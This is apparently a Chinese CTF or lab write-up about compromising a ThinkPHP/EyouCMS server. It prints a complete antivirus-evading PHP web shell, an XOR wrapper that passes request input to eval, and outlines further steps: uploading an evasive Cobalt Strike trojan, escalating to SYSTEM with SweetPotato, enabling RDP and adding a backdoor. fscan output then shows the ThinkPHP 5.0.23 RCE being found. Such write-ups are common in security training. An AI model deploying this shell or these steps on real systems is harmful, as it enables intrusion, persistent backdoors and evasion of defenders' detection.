ThinkPHP

ThinkPHP 进入80端口，用工具直接getshell 生成的后门很快会被查杀，因此可以写入一个免杀木马 <?php function xorEncryptDecrypt($data, $key) { $keyLength = strlen($key); $result = ''; for ($i = 0; $i < strlen($data); $i++) { $keyChar = $key[$i % $keyLength]; $result .= chr(ord($data[$i]) ^ ord($keyChar)); } return $result; } $originalData = $_REQUEST["a"]; $key = $_REQUEST["b"]; $encryptedData = xorEncryptDecrypt($originalData, $key); $decryptedData = xorEncryptDecrypt($encryptedData, $key); echo @eval($decryptedData); ?> //密码是a 根目录拿到flag1 上传免杀CS木马，然后sweetpotato提权到system 开启RDP，添加后门 ...

Fscan [root@Hacking] /home/kali/Desktop ❯ ./fscan -h 192.168.10.10 -p 80 ⏎ ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | | (_| | (__| < │ │ \____/ |___/\___|_| \__,_|\___|_|\_\ │ └──────────────────────────────────────────────┘ Fscan Version: 2.0.0 [2025-07-16 22:41:57] [INFO] 暴力破解线程数: 1 [2025-07-16 22:41:57] [INFO] 开始信息扫描 [2025-07-16 22:41:57] [INFO] 最终有效主机数量: 1 [2025-07-16 22:41:57] [INFO] 开始主机扫描 [2025-07-16 22:41:57] [INFO] 有效端口数量: 1 [2025-07-16 22:41:57] [SUCCESS] 端口开放 192.168.10.10:80 [2025-07-16 22:42:03] [SUCCESS] 服务识别 192.168.10.10:80 => [http] [2025-07-16 22:42:03] [INFO] 存活端口数量: 1 [2025-07-16 22:42:03] [INFO] 开始漏洞扫描 [2025-07-16 22:42:03] [INFO] 加载的插件: webpoc, webtitle [2025-07-16 22:42:04] [SUCCESS] 网站标题 http://192.168.10.10 状态码:200 长度:25157 标题:易优CMS - Powered by Eyoucms.com [2025-07-16 22:42:11] [SUCCESS] 目标: http://192.168.10.10:80 漏洞类型: poc-yaml-thinkphp5023-method-rce 漏洞名称: poc1 详细信息: links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce [2025-07-16 22:42:14] [SUCCESS] 扫描已完成: 2/2 发现存在thinkphp的rce漏洞 ...